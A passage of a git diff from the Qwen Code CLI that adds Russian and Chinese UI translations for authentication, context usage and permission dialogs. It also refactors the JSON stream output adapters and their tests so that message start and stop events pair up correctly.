{{dir}}': + 'Уже охвачен существующим каталогом: {{dir}}', // ============================================================================ // Строка состояния @@ -1519,6 +1623,32 @@ export default { 'Успешная аутентификация с {{region}}. API-ключ и конфигурации моделей сохранены в settings.json (резервная копия создана).', // ============================================================================ + // Context Usage Component + // ============================================================================ + 'Context Usage': 'Использование контекста', + 'No API response yet. Send a message to see actual usage.': + 'Пока нет ответа от API. Отправьте сообщение, чтобы увидеть фактическое использование.', + 'Estimated pre-conversation overhead': + 'Оценочные накладные расходы перед беседой', + 'Context window': 'Контекстное окно', + tokens: 'токенов', + Used: 'Использовано', + Free: 'Свободно', + 'Autocompact buffer': 'Буфер автоупаковки', + 'Usage by category': 'Использование по категориям', + 'System prompt': 'Системная подсказка', + 'Built-in tools': 'Встроенные инструменты', + 'MCP tools': 'Инструменты MCP', + 'Memory files': 'Файлы памяти', + Skills: 'Навыки', + Messages: 'Сообщения', + 'Show context window usage breakdown.': + 'Показать разбивку использования контекстного окна.', + 'Run /context detail for per-item breakdown.': + 'Выполните /context detail для детализации по элементам.', + active: 'активно', + 'body loaded': 'содержимое загружено', + memory: 'память', // MCP Management Dialog // ============================================================================ 'MCP Management': 'Управление MCP', @@ -1628,4 +1758,77 @@ export default { '↑/↓: Навигация | Space/Enter: Переключить | Esc: Отмена', '↑/↓: Navigate | Enter: Select | Esc: Cancel': '↑/↓: Навигация | Enter: Выбор | Esc: Отмена', + + // ============================================================================ + // Commands - Auth + // ============================================================================ + 'Configure Qwen authentication information with Qwen-OAuth or Alibaba Cloud Coding Plan': + 'Настроить аутентификацию Qwen через Qwen-OAuth или Alibaba Cloud Coding Plan', + 'Authenticate using Qwen OAuth': 'Аутентификация через Qwen OAuth', + 'Authenticate using Alibaba Cloud Coding Plan': + 'Аутентификация через Alibaba Cloud Coding Plan', + 'Region for Coding Plan (china/global)': + 'Регион для Coding Plan (china/global)', + 'API key for Coding Plan': 'API-ключ для Coding Plan', + 'Show current authentication status': + 'Показать текущий статус аутентификации', + 'Authentication completed successfully.': 'Аутентификация успешно завершена.', + 'Starting Qwen OAuth authentication...': + 'Запуск аутентификации Qwen OAuth...', + 'Successfully authenticated with Qwen OAuth.': + 'Успешная аутентификация через Qwen OAuth.', + 'Failed to authenticate with Qwen OAuth: {{error}}': + 'Ошибка аутентификации через Qwen OAuth: {{error}}', + 'Processing Alibaba Cloud Coding Plan authentication...': + 'Обработка аутентификации Alibaba Cloud Coding Plan...', + 'Successfully authenticated with Alibaba Cloud Coding Plan.': + 'Успешная аутентификация через Alibaba Cloud Coding Plan.', + 'Failed to authenticate with Coding Plan: {{error}}': + 'Ошибка аутентификации через Coding Plan: {{error}}', + '中国 (China)': '中国 (China)', + '阿里云百炼 (aliyun.com)': '阿里云百炼 (aliyun.com)', + Global: 'Глобальный', + 'Alibaba Cloud (alibabacloud.com)': 'Alibaba Cloud (alibabacloud.com)', + 'Select region for Coding Plan:': 'Выберите регион для Coding Plan:', + 'Enter your Coding Plan API key: ': 'Введите ваш API-ключ Coding Plan: ', + 'Select authentication method:': 'Выберите метод аутентификации:', + '\n=== Authentication Status ===\n': '\n=== Статус аутентификации ===\n', + '⚠️ No authentication method configured.\n': + '⚠️ Метод аутентификации не настроен.\n', + 'Run one of the following commands to get started:\n': + 'Выполните одну из следующих команд для начала:\n', + ' qwen auth qwen-oauth - Authenticate with Qwen OAuth (free tier)': + ' qwen auth qwen-oauth - Аутентификация через Qwen OAuth (бесплатно)', + ' qwen auth coding-plan - Authenticate with Alibaba Cloud Coding Plan\n': + ' qwen auth coding-plan - Аутентификация через Alibaba Cloud Coding Plan\n', + 'Or simply run:': 'Или просто выполните:', + ' qwen auth - Interactive authentication setup\n': + ' qwen auth - Интерактивная настройка аутентификации\n', + '✓ Authentication Method: Qwen OAuth': '✓ Метод аутентификации: Qwen OAuth', + ' Type: Free tier': ' Тип: Бесплатный', + ' Limit: Up to 1,000 requests/day': ' Лимит: До 1 000 запросов/день', + ' Models: Qwen latest models\n': ' Модели: Последние модели Qwen\n', + '✓ Authentication Method: Alibaba Cloud Coding Plan': + '✓ Метод аутентификации: Alibaba Cloud Coding Plan', + '中国 (China) - 阿里云百炼': '中国 (China) - 阿里云百炼', + 'Global - Alibaba Cloud': 'Глобальный - Alibaba Cloud', + ' Region: {{region}}': ' Регион: {{region}}', + ' Current Model: {{model}}': ' Текущая модель: {{model}}', + ' Config Version: {{version}}': ' Версия конфигурации: {{version}}', + ' Status: API key configured\n': ' Статус: API-ключ настроен\n', + '⚠️ Authentication Method: Alibaba Cloud Coding Plan (Incomplete)': + '⚠️ Метод аутентификации: Alibaba Cloud Coding Plan (Не завершён)', + ' Issue: API key not found in environment or settings\n': + ' Проблема: API-ключ не найден в окружении или настройках\n', + ' Run `qwen auth coding-plan` to re-configure.\n': + ' Выполните `qwen auth coding-plan` для повторной настройки.\n', + '✓ Authentication Method: {{type}}': '✓ Метод аутентификации: {{type}}', + ' Status: Configured\n': ' Статус: Настроено\n', + 'Failed to check authentication status: {{error}}': + 'Не удалось проверить статус аутентификации: {{error}}', + 'Select an option:': 'Выберите вариант:', + 'Raw mode not available. Please run in an interactive terminal.': + 'Raw-режим недоступен. Пожалуйста, запустите в интерактивном терминале.', + '(Use ↑ ↓ arrows to navigate, Enter to select, Ctrl+C to exit)\n': + '(↑ ↓ стрелки для навигации, Enter для выбора, Ctrl+C для выхода)\n', }; diff --git a/packages/cli/src/i18n/locales/zh.js b/packages/cli/src/i18n/locales/zh.js index b1086a72d..d22fe9b26 100644 --- a/packages/cli/src/i18n/locales/zh.js +++ b/packages/cli/src/i18n/locales/zh.js @@ -116,6 +116,7 @@ export default { '分析项目并创建定制的 QWEN.md 文件', 'List available Qwen Code tools. Usage: /tools [desc]': '列出可用的 Qwen Code 工具。用法:/tools [desc]', + 'List available skills.': '列出可用技能。', 'Available Qwen Code CLI tools:': '可用的 Qwen Code CLI 工具:', 'No tools available': '没有可用工具', 'View or change the approval mode for tool usage': @@ -437,6 +438,7 @@ export default { '当前支持以下编辑器。请注意,某些编辑器无法在沙箱模式下使用。', 'Your preferred editor is:': '您的首选编辑器是:', 'Manage extensions': '管理扩展', + 'Manage installed extensions': '管理已安装的扩展', 'List active extensions': '列出活动扩展', 'Update extensions. Usage: update |--all': '更新扩展。用法:update |--all', @@ -623,6 +625,37 @@ export default { 'Failed to configure {{terminalName}}.': '配置 {{terminalName}} 失败。', 'Your terminal is already configured for an optimal experience with multiline input (Shift+Enter and Ctrl+Enter).': '您的终端已配置为支持多行输入(Shift+Enter 和 Ctrl+Enter)的最佳体验。', + // ============================================================================ + // Commands - Hooks + // ============================================================================ + 'Manage Qwen Code hooks': '管理 Qwen Code Hook', + 'List all configured hooks': '列出所有已配置的 Hook', + 'Enable a disabled hook': '启用已禁用的 Hook', + 'Disable an active hook': '禁用已启用的 Hook', + + // ============================================================================ + // Commands - Session Export + // ============================================================================ + 'Export current session message history to a file': + '将当前会话的消息记录导出到文件', + 'Export session to HTML format': '将会话导出为 HTML 文件', + 'Export session to JSON format': '将会话导出为 JSON 文件', + 'Export session to JSONL format (one message per line)': + '将会话导出为 JSONL 文件(每行一条消息)', + 'Export session to markdown format': '将会话导出为 Markdown 文件', + + // ============================================================================ + // Commands - Insights + // ============================================================================ + 'generate personalized programming insights from your chat history': + '根据你的聊天记录生成个性化编程洞察', + + // ============================================================================ + // Commands - Session History + // ============================================================================ + 'Resume a previous session': '恢复先前会话', + 'Restore a tool call. This will reset the conversation and file history to the state it was in when the tool call was suggested': + '恢复某次工具调用。这将把对话与文件历史重置到提出该工具调用建议时的状态', 'Could not detect terminal type. Supported terminals: VS Code, Cursor, Windsurf, and Trae.': '无法检测终端类型。支持的终端:VS Code、Cursor、Windsurf 和 Trae。', 'Terminal "{{terminal}}" is not supported yet.': @@ -1010,6 +1043,8 @@ export default { 'No, suggest changes (esc)': '否,建议更改 (esc)', "Allow execution of: '{{command}}'?": "允许执行:'{{command}}'?", 'Yes, allow always ...': '是,总是允许 ...', + 'Always allow in this project': '在本项目中总是允许', + 'Always allow for this user': '对该用户总是允许', 'Yes, and auto-accept edits': '是,并自动接受编辑', 'Yes, and manually approve edits': '是,并手动批准编辑', 'No, keep planning (esc)': '否,继续规划 (esc)', @@ -1163,6 +1198,71 @@ export default { // Dialogs - Permissions // ============================================================================ 'Manage folder trust settings': '管理文件夹信任设置', + 'Manage permission rules': '管理权限规则', + Allow: '允许', + Ask: '询问', + Deny: '拒绝', + Workspace: '工作区', + "Qwen Code won't ask before using allowed tools.": + 'Qwen Code 使用已允许的工具前不会询问。', + 'Qwen Code will ask before using these tools.': + 'Qwen Code 使用这些工具前会先询问。', + 'Qwen Code is not allowed to use denied tools.': + 'Qwen Code 不允许使用被拒绝的工具。', + 'Manage trusted directories for this workspace.': + '管理此工作区的受信任目录。', + 'Any use of the {{tool}} tool': '{{tool}} 工具的任何使用', + "{{tool}} commands matching '{{pattern}}'": + "匹配 '{{pattern}}' 的 {{tool}} 命令", + 'From user settings': '来自用户设置', + 'From project settings': '来自项目设置', + 'From session': '来自会话', + 'Project settings (local)': '项目设置(本地)', + 'Saved in .qwen/settings.local.json': '保存在 .qwen/settings.local.json', + 'Project settings': '项目设置', + 'Checked in at .qwen/settings.json': '保存在 .qwen/settings.json', + 'User settings': '用户设置', + 'Saved in at ~/.qwen/settings.json': '保存在 ~/.qwen/settings.json', + 'Add a new rule…': '添加新规则…', + 'Add {{type}} permission rule': '添加{{type}}权限规则', + 'Permission rules are a tool name, optionally followed by a specifier in parentheses.': + '权限规则是一个工具名称,可选地后跟括号中的限定符。', + 'e.g.,': '例如', + or: '或', + 'Enter permission rule…': '输入权限规则…', + 'Enter to submit · Esc to cancel': '回车提交 · Esc 取消', + 'Where should this rule be saved?': '此规则应保存在哪里?', + 'Enter to confirm · Esc to cancel': '回车确认 · Esc 取消', + 'Delete {{type}} rule?': '删除{{type}}规则?', + 'Are you sure you want to delete this permission rule?': + '确定要删除此权限规则吗?', + 'Permissions:': '权限:', + '(←/→ or tab to cycle)': '(←/→ 或 tab 切换)', + 'Press ↑↓ to navigate · Enter to select · Type to search · Esc to cancel': + '按 ↑↓ 导航 · 回车选择 · 输入搜索 · Esc 取消', + 'Search…': '搜索…', + 'Use /trust to manage folder trust settings for this workspace.': + '使用 /trust 管理此工作区的文件夹信任设置。', + // Workspace directory management + 'Add directory…': '添加目录…', + 'Add directory to workspace': '添加工作区目录', + 'Qwen Code can read files in the workspace, and make edits when auto-accept edits is on.': + 'Qwen Code 可以读取工作区中的文件,并在自动接受编辑模式开启时进行编辑。', + 'Qwen Code will be able to read files in this directory and make edits when auto-accept edits is on.': + 'Qwen Code 将能够读取此目录中的文件,并在自动接受编辑模式开启时进行编辑。', + 'Enter the path to the directory:': '输入目录路径:', + 'Enter directory path…': '输入目录路径…', + 'Tab to complete · Enter to add · Esc to cancel': + 'Tab 补全 · 回车添加 · Esc 取消', + 'Remove directory?': '删除目录?', + 'Are you sure you want to remove this directory from the workspace?': + '确定要将此目录从工作区中移除吗?', + ' (Original working directory)': ' (原始工作目录)', + ' (from settings)': ' (来自设置)', + 'Directory does not exist.': '目录不存在。', + 'Path is not a directory.': '路径不是目录。', + 'This directory is already in the workspace.': '此目录已在工作区中。', + 'Already covered by existing directory: {{dir}}': '已被现有目录覆盖:{{dir}}', // ============================================================================ // Status Bar @@ -1463,6 +1563,33 @@ export default { '{{region}} 有新的模型配置可用。是否立即更新?', '{{region}} configuration updated successfully. Model switched to "{{model}}".': '{{region}} 配置更新成功。模型已切换至 "{{model}}"。', + 'Authenticated successfully with {{region}}. API key and model configs saved to settings.json (backed up).': + '成功通过 {{region}} 认证。API Key 和模型配置已保存至 settings.json(已备份)。', + + // ============================================================================ + // Context Usage + // ============================================================================ + 'Context Usage': '上下文使用情况', + 'Context window': '上下文窗口', + Used: '已用', + Free: '空闲', + 'Autocompact buffer': '自动压缩缓冲区', + 'Usage by category': '分类用量', + 'System prompt': '系统提示', + 'Built-in tools': '内置工具', + 'MCP tools': 'MCP 工具', + 'Memory files': '记忆文件', + Skills: '技能', + Messages: '消息', + tokens: 'tokens', + 'Estimated pre-conversation overhead': '预估对话前开销', + 'No API response yet. Send a message to see actual usage.': + '暂无 API 响应。发送消息以查看实际使用情况。', + 'Show context window usage breakdown.': '显示上下文窗口使用情况分解。', + 'Run /context detail for per-item breakdown.': + '运行 /context detail 查看详细分解。', + 'body loaded': '内容已加载', + memory: '记忆', '{{region}} configuration updated successfully.': '{{region}} 配置更新成功。', 'Authenticated successfully with {{region}}. API key and model configs saved to settings.json.': '成功通过 {{region}} 认证。API Key 和模型配置已保存至 settings.json。', @@ -1493,4 +1620,72 @@ export default { '↑/↓: 导航 | Space/Enter: 切换 | Esc: 取消', '↑/↓: Navigate | Enter: Select | Esc: Cancel': '↑/↓: 导航 | Enter: 选择 | Esc: 取消', + + // ============================================================================ + // Commands - Auth + // ============================================================================ + 'Configure Qwen authentication information with Qwen-OAuth or Alibaba Cloud Coding Plan': + '使用 Qwen OAuth 或阿里云百炼 Coding Plan 配置 Qwen 认证信息', + 'Authenticate using Qwen OAuth': '使用 Qwen OAuth 进行认证', + 'Authenticate using Alibaba Cloud Coding Plan': + '使用阿里云百炼 Coding Plan 进行认证', + 'Region for Coding Plan (china/global)': 'Coding Plan 区域 (china/global)', + 'API key for Coding Plan': 'Coding Plan 的 API 密钥', + 'Show current authentication status': '显示当前认证状态', + 'Authentication completed successfully.': '认证完成。', + 'Starting Qwen OAuth authentication...': '正在启动 Qwen OAuth 认证...', + 'Successfully authenticated with Qwen OAuth.': '已成功通过 Qwen OAuth 认证。', + 'Failed to authenticate with Qwen OAuth: {{error}}': + 'Qwen OAuth 认证失败:{{error}}', + 'Processing Alibaba Cloud Coding Plan authentication...': + '正在处理阿里云百炼 Coding Plan 认证...', + 'Successfully authenticated with Alibaba Cloud Coding Plan.': + '已成功通过阿里云百炼 Coding Plan 认证。', + 'Failed to authenticate with Coding Plan: {{error}}': + 'Coding Plan 认证失败:{{error}}', + '中国 (China)': '中国 (China)', + '阿里云百炼 (aliyun.com)': '阿里云百炼 (aliyun.com)', + Global: '全球', + 'Alibaba Cloud (alibabacloud.com)': 'Alibaba Cloud (alibabacloud.com)', + 'Select region for Coding Plan:': '选择 Coding Plan 区域:', + 'Enter your Coding Plan API key: ': '请输入您的 Coding Plan API 密钥:', + 'Select authentication method:': '选择认证方式:', + '\n=== Authentication Status ===\n': '\n=== 认证状态 ===\n', + '⚠️ No authentication method configured.\n': '⚠️ 未配置认证方式。\n', + 'Run one of the following commands to get started:\n': + '运行以下命令之一开始配置:\n', + ' qwen auth qwen-oauth - Authenticate with Qwen OAuth (free tier)': + ' qwen auth qwen-oauth - 使用 Qwen OAuth 认证(免费)', + ' qwen auth coding-plan - Authenticate with Alibaba Cloud Coding Plan\n': + ' qwen auth coding-plan - 使用阿里云百炼 Coding Plan 认证\n', + 'Or simply run:': '或者直接运行:', + ' qwen auth - Interactive authentication setup\n': + ' qwen auth - 交互式认证配置\n', + '✓ Authentication Method: Qwen OAuth': '✓ 认证方式:Qwen OAuth', + ' Type: Free tier': ' 类型:免费版', + ' Limit: Up to 1,000 requests/day': ' 限额:每天最多 1,000 次请求', + ' Models: Qwen latest models\n': ' 模型:Qwen 最新模型\n', + '✓ Authentication Method: Alibaba Cloud Coding Plan': + '✓ 认证方式:阿里云百炼 Coding Plan', + '中国 (China) - 阿里云百炼': '中国 (China) - 阿里云百炼', + 'Global - Alibaba Cloud': '全球 - Alibaba Cloud', + ' Region: {{region}}': ' 区域:{{region}}', + ' Current Model: {{model}}': ' 当前模型:{{model}}', + ' Config Version: {{version}}': ' 配置版本:{{version}}', + ' Status: API key configured\n': ' 状态:API 密钥已配置\n', + '⚠️ Authentication Method: Alibaba Cloud Coding Plan (Incomplete)': + '⚠️ 认证方式:阿里云百炼 Coding Plan(不完整)', + ' Issue: API key not found in environment or settings\n': + ' 问题:在环境变量或设置中未找到 API 密钥\n', + ' Run `qwen auth coding-plan` to re-configure.\n': + ' 运行 `qwen auth coding-plan` 重新配置。\n', + '✓ Authentication Method: {{type}}': '✓ 认证方式:{{type}}', + ' Status: Configured\n': ' 状态:已配置\n', + 'Failed to check authentication status: {{error}}': + '检查认证状态失败:{{error}}', + 'Select an option:': '请选择:', + 'Raw mode not available. Please run in an interactive terminal.': + '原始模式不可用。请在交互式终端中运行。', + '(Use ↑ ↓ arrows to navigate, Enter to select, Ctrl+C to exit)\n': + '(使用 ↑ ↓ 箭头导航,Enter 选择,Ctrl+C 退出)\n', }; diff --git a/packages/cli/src/nonInteractive/io/BaseJsonOutputAdapter.ts b/packages/cli/src/nonInteractive/io/BaseJsonOutputAdapter.ts index b0d6736a5..dc62f9ae2 100644 --- a/packages/cli/src/nonInteractive/io/BaseJsonOutputAdapter.ts +++ b/packages/cli/src/nonInteractive/io/BaseJsonOutputAdapter.ts @@ -282,12 +282,12 @@ export abstract class BaseJsonOutputAdapter { return; } - if (lastBlock.type === 'text') { - const index = state.blocks.length - 1; - this.onBlockClosed(state, index, actualParentToolUseId); - this.closeBlock(state, index); - } else if (lastBlock.type === 'thinking') { - const index = state.blocks.length - 1; + const index = state.blocks.length - 1; + if (!state.openBlocks.has(index)) { + return; + } + + if (lastBlock.type === 'text' || lastBlock.type === 'thinking') { this.onBlockClosed(state, index, actualParentToolUseId); this.closeBlock(state, index); } @@ -392,7 +392,9 @@ export abstract class BaseJsonOutputAdapter { } const message = this.buildMessage(parentToolUseId); - this.emitMessageImpl(message); + if (state.messageStarted) { + this.emitMessageImpl(message); + } return message; } @@ -656,12 +658,7 @@ export abstract class BaseJsonOutputAdapter { parentToolUseId: string, ): CLIAssistantMessage { const state = this.getMessageState(parentToolUseId); - const message = this.finalizeAssistantMessageInternal( - state, - parentToolUseId, - ); - this.updateLastAssistantMessage(message); - return message; + return this.finalizeAssistantMessageInternal(state, parentToolUseId); } /** diff --git a/packages/cli/src/nonInteractive/io/JsonOutputAdapter.ts b/packages/cli/src/nonInteractive/io/JsonOutputAdapter.ts index a76de53a8..68633675b 100644 --- a/packages/cli/src/nonInteractive/io/JsonOutputAdapter.ts +++ b/packages/cli/src/nonInteractive/io/JsonOutputAdapter.ts @@ -52,12 +52,10 @@ export class JsonOutputAdapter } finalizeAssistantMessage(): CLIAssistantMessage { - const message = this.finalizeAssistantMessageInternal( + return this.finalizeAssistantMessageInternal( this.mainAgentMessageState, null, ); - this.updateLastAssistantMessage(message); - return message; } emitResult(options: ResultOptions): void { diff --git a/packages/cli/src/nonInteractive/io/StreamJsonOutputAdapter.test.ts b/packages/cli/src/nonInteractive/io/StreamJsonOutputAdapter.test.ts index 96977d5b0..64448c8a6 100644 --- a/packages/cli/src/nonInteractive/io/StreamJsonOutputAdapter.test.ts +++ b/packages/cli/src/nonInteractive/io/StreamJsonOutputAdapter.test.ts @@ -654,6 +654,24 @@ describe('StreamJsonOutputAdapter', () => { 'Message not started', ); }); + + it('should not emit empty assistant message when started but no content processed', () => { + stdoutWriteSpy.mockClear(); + adapter.finalizeAssistantMessage(); + + const assistantCalls = stdoutWriteSpy.mock.calls.filter( + (call: unknown[]) => { + try { + const parsed = JSON.parse(call[0] as string); + return parsed.type === 'assistant'; + } catch { + return false; + } + }, + ); + + expect(assistantCalls).toHaveLength(0); + }); }); describe('emitResult', () => { @@ -1007,56 +1025,68 @@ describe('StreamJsonOutputAdapter', () => { }); }); - describe('message_id in stream events', () => { + describe('content_block event identification', () => { beforeEach(() => { adapter = new StreamJsonOutputAdapter(mockConfig, true); adapter.startAssistantMessage(); }); - it('should include message_id in stream events after message starts', () => { + it('should not include message_id in content_block events', () => { adapter.processEvent({ type: GeminiEventType.Content, value: 'Text', }); - // Process another event to ensure messageStarted is true adapter.processEvent({ type: GeminiEventType.Content, value: 'More', }); const calls = stdoutWriteSpy.mock.calls; - // Find all delta events - const deltaCalls = calls.filter((call: unknown[]) => { + const contentBlockCalls = calls.filter((call: unknown[]) => { try { const parsed = JSON.parse(call[0] as string); return ( parsed.type === 'stream_event' && - parsed.event.type === 'content_block_delta' + (parsed.event.type === 'content_block_start' || + parsed.event.type === 'content_block_delta' || + parsed.event.type === 'content_block_stop') ); } catch { return false; } }); - expect(deltaCalls.length).toBeGreaterThan(0); - // The second delta event should have message_id (after messageStarted becomes true) - // message_id is added to the event object, so check parsed.event.message_id - if (deltaCalls.length > 1) { - const secondDelta = JSON.parse( - (deltaCalls[1] as unknown[])[0] as string, - ); - // message_id is on the enriched event object - expect( - secondDelta.event.message_id || secondDelta.message_id, - ).toBeTruthy(); - } else { - // If only one delta, check if message_id exists - const delta = JSON.parse((deltaCalls[0] as unknown[])[0] as string); - // message_id is added when messageStarted is true - // First event may or may not have it, but subsequent ones should - expect(delta.event.message_id || delta.message_id).toBeTruthy(); + expect(contentBlockCalls.length).toBeGreaterThan(0); + for (const call of contentBlockCalls) { + const parsed = JSON.parse((call as unknown[])[0] as string); + expect(parsed.event.message_id).toBeUndefined(); } }); + + it('should identify content_block events by session_id and index', () => { + adapter.processEvent({ + type: GeminiEventType.Content, + value: 'Text', + }); + + const calls = stdoutWriteSpy.mock.calls; + const blockStartCall = calls.find((call: unknown[]) => { + try { + const parsed = JSON.parse(call[0] as string); + return ( + parsed.type === 'stream_event' && + parsed.event.type === 'content_block_start' + ); + } catch { + return false; + } + }); + + expect(blockStartCall).toBeDefined(); + const parsed = JSON.parse((blockStartCall as unknown[])[0] as string); + expect(parsed.session_id).toBe('test-session-id'); + expect(typeof parsed.event.index).toBe('number'); + }); }); describe('multiple text blocks', () => { diff --git a/packages/cli/src/nonInteractive/io/StreamJsonOutputAdapter.ts b/packages/cli/src/nonInteractive/io/StreamJsonOutputAdapter.ts index bf76d025c..c67190e6a 100644 --- a/packages/cli/src/nonInteractive/io/StreamJsonOutputAdapter.ts +++ b/packages/cli/src/nonInteractive/io/StreamJsonOutputAdapter.ts @@ -36,6 +36,8 @@ export class StreamJsonOutputAdapter extends BaseJsonOutputAdapter implements JsonOutputAdapterInterface { + private mainTurnMessageStartEmitted = false; + constructor( config: Config, private readonly includePartialMessages: boolean, @@ -68,29 +70,27 @@ export class StreamJsonOutputAdapter return this.includePartialMessages; } + override startAssistantMessage(): void { + this.mainTurnMessageStartEmitted = false; + super.startAssistantMessage(); + } + finalizeAssistantMessage(): CLIAssistantMessage { - const state = this.mainAgentMessageState; - if (state.finalized) { - return this.buildMessage(null); - } - state.finalized = true; - - this.finalizePendingBlocks(state, null); - const orderedOpenBlocks = Array.from(state.openBlocks).sort( - (a, b) => a - b, + const message = this.finalizeAssistantMessageInternal( + this.mainAgentMessageState, + null, ); - for (const index of orderedOpenBlocks) { - this.onBlockClosed(state, index, null); - this.closeBlock(state, index); + if (this.mainTurnMessageStartEmitted && this.includePartialMessages) { + const partial: CLIPartialAssistantMessage = { + type: 'stream_event', + uuid: randomUUID(), + session_id: this.getSessionId(), + parent_tool_use_id: null, + event: { type: 'message_stop' }, + }; + this.emitMessageImpl(partial); } - - if (state.messageStarted && this.includePartialMessages) { - this.emitStreamEventIfEnabled({ type: 'message_stop' }, null); - } - - const message = this.buildMessage(null); - this.updateLastAssistantMessage(message); - this.emitMessageImpl(message); + this.mainTurnMessageStartEmitted = false; return message; } @@ -249,14 +249,15 @@ export class StreamJsonOutputAdapter /** * Overrides base class hook to emit message_start event when message is started. - * Only emits for main agent, not for subagents. + * Only emits once per turn for the main agent (guarded by mainTurnMessageStartEmitted), + * so block-type transitions inside a single turn do not produce spurious message_start events. */ protected override onEnsureMessageStarted( state: MessageState, parentToolUseId: string | null, ): void { - // Only emit message_start for main agent, not for subagents - if (parentToolUseId === null) { + if (parentToolUseId === null && !this.mainTurnMessageStartEmitted) { + this.mainTurnMessageStartEmitted = true; this.emitStreamEventIfEnabled( { type: 'message_start', @@ -264,6 +265,7 @@ export class StreamJsonOutputAdapter id: state.messageId!, role: 'assistant', model: this.config.getModel(), + content: [], }, }, null, @@ -311,19 +313,12 @@ export class StreamJsonOutputAdapter return; } - const state = this.getMessageState(parentToolUseId); - const enrichedEvent = state.messageStarted - ? ({ ...event, message_id: state.messageId } as StreamEvent & { - message_id: string; - }) - : event; - const partial: CLIPartialAssistantMessage = { type: 'stream_event', uuid: randomUUID(), session_id: this.getSessionId(), parent_tool_use_id: parentToolUseId, - event: enrichedEvent, + event, }; this.emitMessageImpl(partial); } diff --git a/packages/cli/src/nonInteractive/types.ts b/packages/cli/src/nonInteractive/types.ts index 84c2d0ff7..69eaa1dcd 100644 --- a/packages/cli/src/nonInteractive/types.ts +++ b/packages/cli/src/nonInteractive/types.ts @@ -201,6 +201,7 @@ export interface MessageStartStreamEvent { id: string; role: 'assistant'; model: string; + content: []; }; } diff --git a/packages/cli/src/nonInteractiveCli.test.ts b/packages/cli/src/nonInteractiveCli.test.ts index 6a6b33b87..af3c93113 100644 --- a/packages/cli/src/nonInteractiveCli.test.ts +++ b/packages/cli/src/nonInteractiveCli.test.ts @@ -20,6 +20,7 @@ import { uiTelemetryService, FatalInputError, ApprovalMode, + SendMessageType, } from '@qwen-code/qwen-code-core'; import type { Part } from '@google/genai'; import { runNonInteractive } from './nonInteractiveCli.js'; @@ -250,7 +251,7 @@ describe('runNonInteractive', () => { [{ text: 'Test input' }], expect.any(AbortSignal), 'prompt-id-1', - { isContinuation: false }, + { type: SendMessageType.UserQuery }, ); expect(processStdoutSpy).toHaveBeenCalledWith('Hello World'); expect(mockShutdownTelemetry).toHaveBeenCalled(); @@ -300,21 +301,21 @@ describe('runNonInteractive', () => { outputUpdateHandler: expect.any(Function), }), ); - // Verify first call has isContinuation: false + // Verify first call has type: UserQuery expect(mockGeminiClient.sendMessageStream).toHaveBeenNthCalledWith( 1, [{ text: 'Use a tool' }], expect.any(AbortSignal), 'prompt-id-2', - { isContinuation: false }, + { type: SendMessageType.UserQuery }, ); - // Verify second call (after tool execution) has isContinuation: true + // Verify second call (after tool execution) has type: ToolResult expect(mockGeminiClient.sendMessageStream).toHaveBeenNthCalledWith( 2, [{ text: 'Tool response' }], expect.any(AbortSignal), 'prompt-id-2', - { isContinuation: true }, + { type: SendMessageType.ToolResult }, ); expect(processStdoutSpy).toHaveBeenCalledWith('Final answer'); }); @@ -383,7 +384,7 @@ describe('runNonInteractive', () => { ], expect.any(AbortSignal), 'prompt-id-3', - { isContinuation: true }, + { type: SendMessageType.ToolResult }, ); expect(processStdoutSpy).toHaveBeenCalledWith('Sorry, let me try again.'); }); @@ -507,7 +508,7 @@ describe('runNonInteractive', () => { processedParts, expect.any(AbortSignal), 'prompt-id-7', - { isContinuation: false }, + { type: SendMessageType.UserQuery }, ); // 6. Assert the final output is correct @@ -539,7 +540,7 @@ describe('runNonInteractive', () => { [{ text: 'Test input' }], expect.any(AbortSignal), 'prompt-id-1', - { isContinuation: false }, + { type: SendMessageType.UserQuery }, ); // JSON adapter emits array of messages, last one is result with stats @@ -694,7 +695,7 @@ describe('runNonInteractive', () => { [{ text: 'Empty response test' }], expect.any(AbortSignal), 'prompt-id-empty', - { isContinuation: false }, + { type: SendMessageType.UserQuery }, ); // JSON adapter emits array of messages, last one is result with stats @@ -881,7 +882,7 @@ describe('runNonInteractive', () => { [{ text: 'Prompt from command' }], expect.any(AbortSignal), 'prompt-id-slash', - { isContinuation: false }, + { type: SendMessageType.UserQuery }, ); expect(processStdoutSpy).toHaveBeenCalledWith('Response from command'); @@ -941,7 +942,7 @@ describe('runNonInteractive', () => { [{ text: '/unknowncommand' }], expect.any(AbortSignal), 'prompt-id-unknown', - { isContinuation: false }, + { type: SendMessageType.UserQuery }, ); expect(processStdoutSpy).toHaveBeenCalledWith('Response to unknown'); @@ -1299,7 +1300,7 @@ describe('runNonInteractive', () => { [{ text: 'Message from stream-json input' }], expect.any(AbortSignal), 'prompt-envelope', - { isContinuation: false }, + { type: SendMessageType.UserQuery }, ); }); @@ -1775,7 +1776,7 @@ describe('runNonInteractive', () => { [{ text: 'Simple string content' }], expect.any(AbortSignal), 'prompt-string-content', - { isContinuation: false }, + { type: SendMessageType.UserQuery }, ); // UserMessage with array of text blocks @@ -1808,7 +1809,7 @@ describe('runNonInteractive', () => { [{ text: 'First part' }, { text: 'Second part' }], expect.any(AbortSignal), 'prompt-blocks-content', - { isContinuation: false }, + { type: SendMessageType.UserQuery }, ); }); }); diff --git a/packages/cli/src/nonInteractiveCli.ts b/packages/cli/src/nonInteractiveCli.ts index 129bec380..bf29f8f0e 100644 --- a/packages/cli/src/nonInteractiveCli.ts +++ b/packages/cli/src/nonInteractiveCli.ts @@ -19,6 +19,7 @@ import { uiTelemetryService, parseAndFormatApiError, createDebugLogger, + SendMessageType, } from '@qwen-code/qwen-code-core'; import type { Content, Part, PartListUnion } from '@google/genai'; import type { CLIUserMessage, PermissionMode } from './nonInteractive/types.js'; @@ -265,7 +266,11 @@ export async function runNonInteractive( currentMessages[0]?.parts || [], abortController.signal, prompt_id, - { isContinuation: !isFirstTurn }, + { + type: isFirstTurn + ? SendMessageType.UserQuery + : SendMessageType.ToolResult, + }, ); isFirstTurn = false; @@ -385,6 +390,16 @@ export async function runNonInteractive( } } } catch (error) { + // Ensure message_start / message_stop (and content_block events) are + // properly paired even when an error aborts the turn mid-stream. + // The call is safe when no message was started (throws → caught) or + // when already finalized (idempotent guard inside the adapter). + try { + adapter.finalizeAssistantMessage(); + } catch { + // Expected when no message was started or already finalized + } + // For JSON and STREAM_JSON modes, compute usage from metrics const message = error instanceof Error ? error.message : String(error); const metrics = uiTelemetryService.getMetrics(); diff --git a/packages/cli/src/services/BuiltinCommandLoader.test.ts b/packages/cli/src/services/BuiltinCommandLoader.test.ts index 7d4f50421..43da3235c 100644 --- 